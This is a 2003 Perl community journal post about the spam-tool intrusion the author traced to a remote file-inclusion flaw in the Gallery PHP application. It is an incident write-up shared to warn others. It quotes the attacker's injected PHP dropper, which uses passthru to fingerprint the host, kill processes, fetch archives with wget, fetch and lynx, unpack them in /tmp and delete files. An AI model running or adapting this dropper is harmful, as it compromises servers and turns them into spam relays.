Slash Boxes
NOTE: use Perl; is on undef hiatus. You can read content, but you can't post it. More info will be forthcoming forthcomingly.

All the Perl that's Practical to Extract and Report

use Perl Log In

Log In

[ Create a new account ]

Purdy (2383)

AOL IM: EmeraldWarp (Add Buddy, Send Message)
Yahoo! ID: jpurdy2 (Add User, Send Message)

Bleh - not feeling creative right now. You can check me out on PerlMonks [].

Journal of Purdy (2383)

Friday May 23, 2003
08:15 AM

Hijack through PHP and Hack/Spam through Perl

[ #12402 ]

Thought you guys would find this interesting. I found the source of the spam problem that I was going through twice: a vulnerability in Gallery (versions prior to 1.3.3). You can read my thread to see the technical details, but here's the jist.

Gallery would allow a remote inclusion of another PHP script, which for this spam hack, looked like this:

<?echo "<pre>";

passthru("which perl");
passthru("which dig");
echo "uname ";
passthru("uname -a");
echo "\nhostname ";
echo "\n";


passthru("kill -9 `cat /tmp/sess_9e4d0713ad1a561e77c93643bafef7a8`");
passthru("rm -rf /tmp/af56j");
passthru("mkdir /tmp/af56j");
passthru("fetch -o- > /tmp/af56j/archive1.tgz");
passthru("lynx -dump -source > /tmp/af56j/archive2.tgz");
passthru("wget -P /tmp/af56j");
passthru("ls -la/tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive1.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive2.tgz -C /tmp/af56j");
passthru("rm -rf /tmp/af56j/archive*");
passthru("chmod 700 /tmp/af56j/");

passthru("rm -f /tmp/af56j/");
passthru("ls -la /tmp/af56j");

Here are the contents of archive2.tgz:

$ tar -tzvf archive2.tgz
-rwxrwxr-x adminsp/games 5044 2003-05-12 05:22
drwxrwxr-x adminsp/games 0 2003-03-02 09:58 lib/
drwxrwxr-x adminsp/games 0 2003-02-01 06:29 lib/Net/
-r--rw-r-- adminsp/games 8762 2003-02-03 05:11 lib/Net/
-r--rw-r-- adminsp/games 9703 2003-02-03 05:11 lib/Net/
-r--rw-r-- adminsp/games 3387 2003-02-03 05:11 lib/Net/
-rw-r--r-- adminsp/1000 3771 2003-02-03 05:10 lib/

Then, here's the script (linked to, to keep this post short{er}).



The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
More | Login | Reply
Loading... please wait.